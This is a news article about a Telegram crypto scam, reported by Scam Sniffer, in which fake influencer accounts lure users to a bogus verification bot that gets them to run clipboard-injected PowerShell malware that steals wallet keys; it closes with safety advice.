A new form of Crypto scam appears via Telegram

Scam Sniffer, the web3 crime prevention company posted a warning about a new form of sophisticated scam that is emerging, targeting crypto users through its Telegram platform.

According to Scam Sniffer, scammers take advantage of the images of well-known KOLs (Key Opinion Leaders) in the crypto community to create false trust. They create fake accounts with names and pictures identical to these KOLs, and then comment on legitimate posts to build credibility.

In these comments, they invite users to participate in “exclusive” Telegram groups, with the promise of providing confidential investment information or superior earning opportunities that only the invitees know.

When users join these groups, they immediately ask them to verify their identity through a bot called “OfficiaiSafeGuardBot.” This is essentially a fake bot, designed to trick users by creating a fake emergency.

Bots often report that the verification time is very short, of only a few minutes, leaving users with insufficient time to check the authenticity of the bot or Telegram group they are joining. This psychological factor makes many people lose their guard and follow the bot's request in a hurry.

The verification process is essentially a sophisticated trap. The bot will ask the user to execute a command or a piece of code, but when doing this, PowerShell malware is injected into their clipboard (cache).

Once this snippet is executed, it automatically downloads and activates the malware on the user's computer or device. This malware is capable of stealing sensitive information, including personal keys (private key) of the crypto wallet, thereby appropriating all the assets in the wallet.

It is worth noting that this type of malicious code has been detected and flagged as dangerous by security systems such as VirusTotal. However, the speed of its spread is still very fast due to the effective combination of psychological deception techniques and technology.

There have been many victims of this form of fraud. Not only did they lose control of the crypto wallet, but other important personal information was compromised, with serious financial consequences.

This is not just a form Phishing(spoofing emails or websites to steal information), but also a step further when combining social engineering and malware. This shows the increasing sophistication of these forms of attack in the crypto space.

To protect themselves from these threats, users need to adhere to a number of important principles.

First, never execute commands or snippets of code that you don't fully understand, especially when they come from unreliable sources. Always check the officiality of the Telegram channels or groups you join, and be wary of verification requests that are short or time pressured.

Use a hardware wallet to store crypto assetsyours, since this type of wallet does not connect directly to the internet and is therefore more secure from cyber attacks.

Also, avoid installing any software of unknown origin, especially if the software requires access to your system or sensitive information.

This form of fraud represents a new step in the way cybercriminals target crypto users. It not only takes advantage of community trust in KOLs but also incorporates sophisticated psychological tactics and malicious code to steal property.

Raising awareness of these threats and sharing information to protect communities is essential in the context of increasingly sophisticated phishing tricks.

If you are not careful, anyone can become a victim of these conspiracies. Always be vigilant and follow safety measures to protect your property and information.